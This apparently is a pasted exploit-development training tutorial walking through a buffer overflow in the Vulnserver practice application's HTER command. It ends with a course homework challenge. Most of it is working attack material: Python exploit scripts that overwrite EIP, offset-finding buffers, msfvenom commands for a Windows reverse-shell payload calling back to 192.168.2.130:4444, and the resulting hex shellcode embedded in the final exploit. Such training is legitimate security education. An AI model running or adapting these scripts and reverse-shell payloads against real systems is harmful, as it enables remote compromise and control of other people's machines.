  642. * Vulnserver – HTER command buffer overflow exploit *
  643. *****************************************************
  644.  
  645. - HTER command of VulnServer has a vulnerability. Let us try to create an exploit for this vulnerability.
  646.  
  647.  
  648.  
  649. - The PoC python script:
  650.  
  651. --------------------------Code--------------------------------
  652.  
  653. #!/usr/bin/python
  654.  
  655. import socket
  656. import os
  657. import sys
  658.  
  659. buffer = "HTER " + "A" * 2106
  660.  
  661. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  662. expl.connect(('127.0.0.1', 9999))
  663. expl.recv(100)
  664. expl.send(buffer)
  665. expl.close()
  666.  
  667. ------------------------------------------------------------
  668.  
  669. - The script sends A characters. However the EIP is overwritten with 0xAAAAAAAA, instead of 0x41414141.
  670.  
  671. - It seems our buffer is somehow converted into hex byte array. Let us make a test, send a byte which contains 0123456789abcdef twice and check it in the memory. The buffer:
  672.  
  673. buffer = “HTER ” + “0123456789abcdef0123456789abcdef” + “A” * 2106
  674.  
  675.  
  676. - Our hypothesis seems to correct, however the first “0” character was removed. Let us change “HTER” to “HTER 0“. Now the shellcode can be appended right after this string.
  677.  
  678.  
  679. 1. Identify the position of EIP
  680.  
  681. - We cannot use the Metasploit module, because the buffer is converted and it would not work. We have to use a different method. We can send a crafted buffer which contains only 0-9 and a-f characters and check the EIP. I use the same PoC script and only show you how the buffer is created.
  682.  
  683. - The first iteration:
  684.  
  685. buffer = “HTER 0”
  686.  
  687. buffer += “1” * 200
  688. buffer += “2” * 200
  689. buffer += “3” * 200
  690. buffer += “4” * 200
  691. buffer += “5” * 200
  692. buffer += “6” * 200
  693. buffer += “7” * 200
  694. buffer += “8” * 200
  695. buffer += “9” * 200
  696. buffer += “a” * 200
  697. buffer += “b” * 200
  698. buffer += “c” * 200
  699.  
  700. The value of EIP: BBBBBBBB. Great! The position of RET value is after 2000 byte.
  701.  
  702.  
  703.  
  704. - The second iteration:
  705.  
  706. buffer = “HTER 0” + “A” * 2000
  707.  
  708. buffer += “1” * 20
  709. buffer += “2” * 20
  710. buffer += “3” * 20
  711. buffer += “4” * 20
  712. buffer += “5” * 20
  713. buffer += “6” * 20
  714. buffer += “7” * 20
  715. buffer += “8” * 20
  716. buffer += “9” * 20
  717. buffer += “a” * 20
  718.  
  719. The value of EIP: 33333333. Great! The position of RET value is after 2040 byte.
  720.  
  721.  
  722.  
  723. - The third iteration:
  724.  
  725. buffer = “HTER 0” + “A” * 2040
  726.  
  727. buffer += “1” * 2
  728. buffer += “2” * 2
  729. buffer += “3” * 2
  730. buffer += “4” * 2
  731. buffer += “5” * 2
  732. buffer += “6” * 2
  733. buffer += “7” * 2
  734. buffer += “8” * 2
  735. buffer += “9” * 2
  736. buffer += “a” * 2
  737.  
  738. - The value of EIP: 44332211. Great! We found the position of the bytes which will be written into EIP.
  739.  
  740.  
  741.  
  742. - Test it with the following script:
  743.  
  744. --------------------------Code--------------------------------
  745.  
  746. #!/usr/bin/python
  747.  
  748. import socket
  749. import os
  750. import sys
  751.  
  752.  
  753. buffer = "HTER 0" + "A" * 2040 + "42424242" + "A" * (4106 - 1 - 2040 - 8)
  754.  
  755. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  756. expl.connect(('127.0.0.1', 9999))
  757. expl.recv(100)
  758. expl.send(buffer)
  759. expl.close()
  760.  
  761. -------------------------------------------------------------
  762.  
  763.  
  764. - The value of EIP: 42424242. It works fine! We can control the EIP register.
  765.  
  766.  
  767. 2. Find value for EIP
  768.  
  769. - The EAX register points to the beginning of our buffer, which starts after the “HTER 0” string. Find a JMP EAX value and update the script. Do not forget, that the address should be in reverse order. Place a breakpoint to the JMP EAX address and check whether the breakpoint is hit.
  770.  
  771. - It works fine again. The final step is to add for example a reverse shell payload to the exploit.
  772.  
  773.  
  774.  
  775. 3. Add shellcode to the exploit
  776.  
  777. Generate a shellcode with venom and add it to the script.
  778.  
  779. --------------------------Type this--------------------------------
  780.  
  781. msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=192.168.2.130 LPORT=4444 > shellcode.bin
  782. -------------------------------------------------------------------
  783.  
  784. Hex values can be displayed with hexdump:
  785.  
  786. --------------------------Type this--------------------------------
  787.  
  788. hexdump -C shellcode.bin
  789. -------------------------------------------------------------------
  790.  
  791. - This will however not trigger the vulnerability. What is the problem? The shellcode must not contain double zero string (“00”)! Let us generate the shellcode again, but add -b ‘\x00’ to the parameter list of msfvenom.
  792.  
  793. --------------------------Type this--------------------------------
  794. msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=192.168.2.130 LPORT=4444 -b ‘\x00’ > shellcode.bin
  795. -------------------------------------------------------------------
  796.  
  797.  
  798. - Msfvenom uses shikata_ga_nai encoder automaticaly, because we specified bad characters with the -b option. The final shellcode size is 351 byte. Add it to the script and test it
  799.  
  800. --------------------------Code--------------------------------
  801.  
  802. #!/usr/bin/python
  803.  
  804. import socket
  805. import os
  806. import sys
  807.  
  808.  
  809. shellcode = (
  810. "bec9d8bc2cd9eed97424f45f2bc9b152"
  811. "83c70431770e03bed65ed9bc0f1c223c"
  812. "d041aad9e141c8aa52729afe5ef9ceea"
  813. "d58fc61d5d2531105e160133dc655693"
  814. "dda5abd21adb4686f397f53677edc5bd"
  815. "cbe34d229b027ff5975c5ff474d5d6ee"
  816. "99d0a1856aae334fa34f9fae0ba2e1f7"
  817. "ac5d9401cfe0afd6ad3e25cc16b49d28"
  818. "a6197bbba4d60fe3a8e9dc98d562e34e"
  819. "5c30c04a04e269cbe045950b4b393340"
  820. "662e4e0bef8363b3ef8bf4c0dd14af4e"
  821. "6edc698991f7ce056cf82e0cabac7e26"
  822. "1acd14b6a318bae60bf37b56eca313bc"
  823. "e39c04bf29b5af3aba7a8746b813da46"
  824. "adbf53a0a72f327b50c91ff7c1168a72"
  825. "c19d39838c553797799602c52ca9b861"
  826. "b2382771bd20f026ea9709a20681a3d0"
  827. "da578b5001a41259c490304910187d3d"
  828. "cc4f2bebaa399d4565957701f0d54757"
  829. "fd333eb74cea07c8617a80b19f1a6f68"
  830. "242a3a300da3e3a10fae131c53d79794"
  831. "2c2c87dd29680f0e40e1fa30f7022f"
  832. )
  833.  
  834. # 77DB0BCD from ntdll.dll
  835.  
  836. buffer = "HTER 0" + shellcode + "A" * (2040 - len(shellcode)) + "CD0BDB77" + "A" * (4106 - 1 - 2040 - 8)
  837.  
  838. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  839. expl.connect(('127.0.0.1', 9999))
  840. expl.recv(100)
  841. expl.send(buffer)
  842. expl.close()
  843.  
  844. --------------------------------------------------------------
  845.  
  846.  
  847. - This will trigger the vulnerability. Our shellcode starts to execute, but later it causes an exception. Why?
  848.  
  849. - Check the value of EIP and ESP. EIP is the Instruction Pointer. The CPU executes the instruction, which is on this memory address and increments its value, thus moves to the next instruction. ESP is the Stack Pointer. Stack is a FIFO (First In First Out) and when a value is pushed onto the stack, the value of the ESP is decremented. EIP goes from low to high memory, ESP goes from high to low memory (if new values is being pushed onto the stack.)
  850.  
  851. - If EIP is bigger, than ESP, there is no problem as they are moving away from each other. If EIP is lower than ESP, a problem can raise as they go toward each other and the the program code might change if ESP reaches EIP.
  852.  
  853. - What is the solution? We have to set the ESP above the EIP. When we jump to the beginning of the shellcode, we can push the value of EAX, then pop this value into ESP. A couple NOP operation might also be necessary
  854.  
  855. --------------------------Code--------------------------------
  856.  
  857. #!/usr/bin/python
  858.  
  859. import socket
  860. import os
  861. import sys
  862.  
  863.  
  864. shellcode = (
  865. "bec9d8bc2cd9eed97424f45f2bc9b152"
  866. "83c70431770e03bed65ed9bc0f1c223c"
  867. "d041aad9e141c8aa52729afe5ef9ceea"
  868. "d58fc61d5d2531105e160133dc655693"
  869. "dda5abd21adb4686f397f53677edc5bd"
  870. "cbe34d229b027ff5975c5ff474d5d6ee"
  871. "99d0a1856aae334fa34f9fae0ba2e1f7"
  872. "ac5d9401cfe0afd6ad3e25cc16b49d28"
  873. "a6197bbba4d60fe3a8e9dc98d562e34e"
  874. "5c30c04a04e269cbe045950b4b393340"
  875. "662e4e0bef8363b3ef8bf4c0dd14af4e"
  876. "6edc698991f7ce056cf82e0cabac7e26"
  877. "1acd14b6a318bae60bf37b56eca313bc"
  878. "e39c04bf29b5af3aba7a8746b813da46"
  879. "adbf53a0a72f327b50c91ff7c1168a72"
  880. "c19d39838c553797799602c52ca9b861"
  881. "b2382771bd20f026ea9709a20681a3d0"
  882. "da578b5001a41259c490304910187d3d"
  883. "cc4f2bebaa399d4565957701f0d54757"
  884. "fd333eb74cea07c8617a80b19f1a6f68"
  885. "242a3a300da3e3a10fae131c53d79794"
  886. "2c2c87dd29680f0e40e1fa30f7022f"
  887. )
  888.  
  889. nops = "90" * 32
  890.  
  891. # 77DB0BCD from ntdll.dll
  892.  
  893. buffer = "HTER 0505c" + nops + shellcode + "A" * (2040 - 4 - len(nops) - len(shellcode)) + "CD0BDB77" + "A" * (4106 - 1 - 2040 - 8)
  894.  
  895. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  896. expl.connect(('127.0.0.1', 9999))
  897. expl.recv(100)
  898. expl.send(buffer)
  899. expl.close()
  900.  
  901. --------------------------------------------------------------
  902.  
  903.  
  904. You can download the attack scripts from today from here:
  905.  
  906.  
  907. Quick challenge:
  908. Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement